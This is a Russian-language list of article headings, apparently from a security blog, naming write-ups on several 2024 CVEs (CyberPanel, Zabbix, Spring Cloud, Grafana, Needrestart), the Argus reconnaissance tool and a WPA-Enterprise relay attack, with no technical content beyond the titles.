
Подготовка стендового окружения

Установка WordPress

Разбор уязвимости

Первый вектор

Второй вектор

Рекомендации по устранению

Заключение

CyberPanel Command Injection Vulnerability (CVE-2024-51378)

Введение

Что такое CyberPanel

Подготовка стендового окружения

Разбор уязвимости

Рекомендации по устранению

Заключение

Remote Code Execution через SQL инъекцию в Zabbix (CVE-2024-42327)

Введение

Для чего нужен:

Об уязвимости

Подготовка тестового окружения

Подготовка условий для эксплуатации уязвимости

Эксплуатация уявзимости

Вывод

CVE-2024-37084: удаленное выполнение кода в Spring Cloud

Введение

Описание уязвимости

Подготовка стенда

Разбор уязвимости

Реализация уязвимости

Заключение

Уязвимость CVE-2024-9264: Удаленное выполнение кода в Grafana через SQL-выражения

Введение

Описание уязвимости

Подготовка стендового окружения

Создание пользователя

Разбор уязвимости

Заключение

Linux LPE через Needrestart (CVE-2024-48990)

Введение

Что такое Needrestart

Разбор уязвимости

Рекомендации по устранению

Заключение

Argus - мощный инструмент для разведки

Введение

Установка

Как и для чего можно использовать

Инструменты для работы с сетью и инфраструктурой

Инструменты анализа веб-приложений

Инструменты безопасности и разведки угроз

Как использовать Argus

Демонстрация применения

Заключение

Часть 3. Тестируем безопасность WPA-Enterprise: EAP (MSCHAPv2) Relay attack

Введение

Чуть-чуть теории

Подготовка к атаке

Практика

Заключение